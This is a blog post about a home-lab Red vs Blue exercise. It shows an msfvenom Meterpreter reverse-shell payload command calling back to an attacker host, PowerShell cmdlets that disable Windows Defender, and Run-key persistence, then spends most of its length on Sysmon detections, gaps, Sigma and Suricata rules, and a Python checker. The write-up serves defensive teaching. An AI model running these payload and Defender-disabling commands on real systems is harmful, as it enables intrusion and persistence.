DEV Community

Akshat Tiwari

How I Hunted a Meterpreter C2 Session Using Sysmon

Introduction

The attacker was already inside. A reverse shell was open, a flag file had been stolen, and Windows Defender was quietly switched off. But none of that happened in silence — Sysmon was watching the entire time.

In this post I'm breaking down exactly how I detected a live Meterpreter C2 session using only Sysmon telemetry during a Red vs Blue simulation I ran in my home lab. No fancy EDR. No threat intel feed. Just Sysmon event logs and knowing what to look for.


The Setup

Two VMs. One goal. Break in and steal the flag — then switch sides and figure out what the logs recorded.

  • Red Team (attacker): Kali Linux — 192.168.1.19
  • Blue Team (target): Windows 10 — 192.168.1.20
  • Detection stack: Sysmon with SwiftOnSecurity config, Wazuh SIEM
  • Exercise: Operation Red Dawn — a solo Red vs Blue simulation

The rules were simple: Red Team operates freely, Blue Team reviews telemetry after and identifies every step of the attack chain. Solo exercise — I played both roles.


The Attack (What Red Team Did)

Here's the full kill chain executed in roughly 23 minutes.

First, I generated a reverse TCP payload using msfvenom:

msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.19 LPORT=4444 -f exe -o /tmp/update.exe

That produced update.exe — 7,680 bytes, no code signing, no version metadata. I served it from a Python HTTP server on port 8080, then on the Windows side used PowerShell's Invoke-WebRequest to pull it down into C:\Users\Public\.

Before executing, I disabled Windows Defender:

Set-MpPreference -DisableRealtimeMonitoring $true
Add-MpPreference -ExclusionPath C:\Users\Public

Then Start-Process C:\Users\Public\update.exe — and Meterpreter session 1 opened: 192.168.1.19:4444 -> 192.168.1.20:51174.

From there: enumerated privileges, found SeDebugPrivilege and SeImpersonatePrivilege, installed registry-based persistence at HKCU\Software\ZuQhcxWs with a base64-encoded PowerShell blob and a Run key at HKCU\Software\Microsoft\Windows\CurrentVersion\Run\U66ZUIM6, then exfiltrated the dummy flag:

FLAG{R3d_Dawn_2026}

Clean, fast, and mostly undetected in real time. Mostly.


What Sysmon Caught (The Detection)

Switching to Blue Team. Pulling up Wazuh and filtering Sysmon events — here's what the logs handed me.

Detection 1 — Process Creation (Event ID 1)

The moment update.exe executed, Sysmon fired an EID 1. Here's what the key fields looked like:

Image:          C:\Users\Public\update.exe
ParentImage:    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion:    -
Description:    -
Company:        -
IntegrityLevel: High
MD5:            02AAE8259567C4AF91CD87693F912E8F

Let me explain why this single event is so loud. Every legitimate executable has metadata — a FileVersion, a Company name, a Description. Something like chrome.exe shows Google LLC. notepad.exe shows Microsoft Corporation. update.exe here shows nothing. Three dashes where the metadata should be.

Then there's the parent process: PowerShell. Legitimate software doesn't get launched by PowerShell at High integrity from a Public folder. C:\Users\Public\ isn't a software installation directory — nothing real lives there. This combination alone is enough to open an incident.

Detection 2 — Network Connection (Event ID 3)

Within seconds of execution, EID 3 fired:

Image:           C:\Users\Public\update.exe
DestinationIp:   192.168.1.19
DestinationPort: 4444
Protocol:        tcp

The same unsigned, no-metadata process that just spawned from PowerShell immediately phoned home on port 4444. That's the Metasploit default C2 port — practically a signature at this point. Any outbound TCP connection on 4444 from a non-browser process should be an immediate alert in your environment. This one confirmed the compromise.

Detection 3 — SmartScreen Triggered (Event ID 1)

There was one more signal I almost missed. Just before update.exe ran, Sysmon logged another EID 1: smartscreen.exe launching to inspect the file. Windows itself tried to wave the red flag before execution. In a production environment with proper alerting, SmartScreen triggering on an executable launched by PowerShell from a Public folder would be worth auto-escalating.

So Sysmon gave me three detection opportunities in under two seconds. The attack wasn't invisible — it was just that no one was watching in real time.


What We Missed (Gaps)

Sysmon caught a lot. But being honest about the gaps matters more.

Gap 1 — Defender disablement. Set-MpPreference -DisableRealtimeMonitoring $true ran without a single alert. Because Tamper Protection was off, one PowerShell cmdlet silently switched off AV. No EID fired. No Wazuh alert. PowerShell Script Block Logging (EID 4104) wasn't configured, so the cmdlet went completely unrecorded.

Gap 2 — Registry persistence. The Metasploit persistence module created HKCU\Software\ZuQhcxWs with a large base64 payload blob and a Run key for auto-execution on logon. Sysmon can log registry changes via EID 13 — but my config wasn't watching HKCU\Software\ for new key creation. Found it manually during investigation. Should have been an automatic alert.

Gap 3 — File exfiltration. The flag left the machine over the existing Meterpreter C2 session. No DLP. No file transfer alerting. No Suricata on the internal interface to catch the data movement. It was gone before I even started the Blue Team review.


Detection Rules We Built After

Two rules came directly out of this exercise.

Sigma — Unsigned EXE from Public Folder:

title: Suspicious Executable from Public Folder
status: experimental
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 1
    Image|contains: '\Users\Public\'
    Description: '-'
  condition: selection
level: high

Suricata — C2 Port 4444 Outbound:

# Destination is "any" rather than $EXTERNAL_NET: in this lab the C2 listener
# (192.168.1.19) sits inside $HOME_NET, so a $HOME_NET -> $EXTERNAL_NET rule
# would never have fired on the session above.
alert tcp $HOME_NET any -> any 4444 \
(msg:"Meterpreter C2 Port 4444 Outbound"; \
flow:established,to_server; sid:1000080; rev:1;)

Both go into my personal detection library. Every gap Red Team finds, Blue Team closes.
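To show how the two rules above behave side by side, and to close the EID 13 Run-key gap from the previous section, here is an added Python checker that is not part of the original post. The event dicts are constructed to mirror the Sysmon fields quoted earlier (the SID in the registry path is a placeholder), and the rule names are my own.

```python
from collections import defaultdict

# Constructed Sysmon events modelled on the fields quoted in the post (not exported logs).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Users\Public\update.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Description": "-", "Company": "-", "IntegrityLevel": "High"},
    {"EventID": 3, "Image": r"C:\Users\Public\update.exe",
     "DestinationIp": "192.168.1.19", "DestinationPort": 4444, "Protocol": "tcp"},
    {"EventID": 1, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Description": "Google Chrome", "Company": "Google LLC", "IntegrityLevel": "Medium"},
    # Sysmon records HKCU under HKU\<SID>; the SID below is a placeholder, not a real one.
    {"EventID": 13, "Image": r"C:\Users\Public\update.exe",
     "TargetObject": r"HKU\S-1-5-21-PLACEHOLDER\Software\Microsoft\Windows\CurrentVersion\Run\U66ZUIM6"},
]

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}

def detect(event):
    """Return (rule, severity) hits for one Sysmon event; an empty list means no finding."""
    hits = []
    image = event.get("Image", "").lower()
    from_public = "\\users\\public\\" in image
    if event["EventID"] == 1:
        # Sigma rule above: executable from the Public folder carrying no file metadata.
        no_metadata = event.get("Description", "-") == "-" and event.get("Company", "-") == "-"
        if from_public and no_metadata:
            hits.append(("unsigned_exe_public_folder", "high"))
        # PowerShell parent at High integrity launching an EXE from a user-writable path.
        parent = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
        if parent == "powershell.exe" and from_public and event.get("IntegrityLevel") == "High":
            hits.append(("powershell_spawned_exe_high_integrity", "high"))
    elif event["EventID"] == 3:
        # Host-side twin of the Suricata rule: port 4444 from any process that is not a browser.
        if event.get("DestinationPort") == 4444 and image.rsplit("\\", 1)[-1] not in BROWSERS:
            hits.append(("c2_port_4444_outbound", "critical"))
    elif event["EventID"] == 13:
        # Gap 2: a value written under a CurrentVersion\Run key is logon persistence.
        if "\\currentversion\\run\\" in event.get("TargetObject", "").lower():
            hits.append(("run_key_persistence", "medium"))
    return hits

def triage(events):
    """Correlate hits per Image; any image tripping two or more rules is an incident."""
    by_image = defaultdict(list)
    for ev in events:
        for rule, _severity in detect(ev):
            by_image[ev["Image"]].append(rule)
    return {img: rules for img, rules in by_image.items() if len(rules) >= 2}
```

Run against the sample set, update.exe trips all four rules while chrome.exe trips none, which is the correlation a Wazuh rule chain would need to raise a single incident instead of four alerts.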


Key Takeaways

  • Sysmon EID 1 is your best friend — process metadata tells the whole story before you look at anything else
  • Unsigned executables from user-writable paths are always suspicious — no legitimate software installs to C:\Users\Public\
  • PowerShell as parent of an unknown EXE means investigate immediately — that combination is not normal
  • Port 4444 outbound from a non-browser process likely means C2 — block it at the firewall and alert on it with Suricata
  • Enable Defender Tamper Protection — one PowerShell cmdlet should not be able to disable your antivirus

Conclusion

That's Operation Red Dawn. A 23-minute compromise, a stolen flag, and a set of Sysmon events that told the full story — if you knew where to look.

This exercise is part of a larger home lab journey I've been documenting — running structured Red vs Blue scenarios from first principles, generating detection rules, and updating response playbooks after every engagement.

The biggest lesson wasn't technical. It was this: attackers don't need to be stealthy if defenders aren't watching. Sysmon had everything. The gap was the alerting pipeline, not the telemetry.

If you're learning Blue Team skills or building a SOC career, drop a comment below. Let's connect.
